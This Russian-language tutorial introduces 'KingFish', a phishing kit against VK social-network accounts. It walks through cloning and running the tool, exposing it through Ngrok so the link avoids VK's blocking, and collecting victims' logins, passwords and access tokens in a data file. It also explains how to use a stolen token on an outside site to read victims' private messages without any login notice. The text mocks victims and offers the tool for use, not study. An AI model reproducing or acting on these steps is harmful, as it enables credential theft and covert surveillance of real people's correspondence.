KingFish Король фишинга.

KingFish
Король фишинга.
Это фишинг ВК с проверкой на валидность полученных данных (логин и пароль + токен в подарок)
Установка:
git clone https://github.com/termux-lab/kingfish.git
Использование:
cd kingfish
python3 fsh.py
>>Далее указывам порт. (По умолчанию 8080)

Готово. Сервер запустился.
Теперь наша ссылка выглядит так:
http://localhost:8080
(8080 - порт который мы указали)

Что бы сделать его общедоступным, нам необходимо иметь или Ngrok или использовать localhost.run
(Советую Ngrok т.к и там есть протокол https, но преимущество в том, что вк не блочит ссылку )

Запускаем Ngrok:
ngrok http 8080
В место 8080, указываем тот порт, который мы указали при запуске утилиты в локальном сервере.

После запуска Ngrok, копируем ссылку с протоколом https.

После того как жертва перейдет по ссылке и напишет не верный логин или пароль, то его ждёт облом :)

Все не верные и верные логины и пароли, будут в файле data.html
https://[ваша ссылка]/data.html

То, что выделено красным - не верные данные.
Зелёным - Валид.

Так же утилита даёт возможность авторизоваться на аккаунте жертвы без уведомления ;)

После того как жертва напишет верный логин и пароль, мы получим не только логин и пароль, но и токен.

Берём полученный токен и идём сюдаhttps://vkserv.ru/api/inst/get-messages

Там вставляем полученный токен и мы без ведома жертвы(без уведомления об авторизации) читаем переписки ;)